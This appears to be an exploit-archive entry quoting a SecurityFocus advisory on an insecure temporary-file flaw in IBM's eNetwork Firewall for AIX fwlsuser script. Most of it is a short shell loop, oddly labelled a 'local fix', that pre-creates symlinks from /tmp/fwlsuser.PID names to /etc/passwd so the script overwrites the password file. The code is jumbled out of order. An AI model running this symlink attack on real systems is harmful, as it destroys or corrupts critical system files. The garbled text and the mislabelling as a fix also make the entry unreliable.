No description provided by source.
soure: http://www.securityfocus.com/bid/287/info IBM's eNetwork Firewall for AIX contains a number of vulnerability in scripts which manipulate files insecurely. When fwlsuser script is run it creates a temporary file called /tmp/fwlsuser.PID ( where PID is the process ID of the command being run ). If this file is created previously and is a link to any other file the output generated by the fwlsuser script will overwrite this linked file. x = 5000 while true LOCAL FIX AS REPORTED BY ORIGINATOR: ln -s /etc/passwd /tmp/fwlsuser.$x # rm /tmp/fwlsuser.$x let x=$x+1 echo $x done exit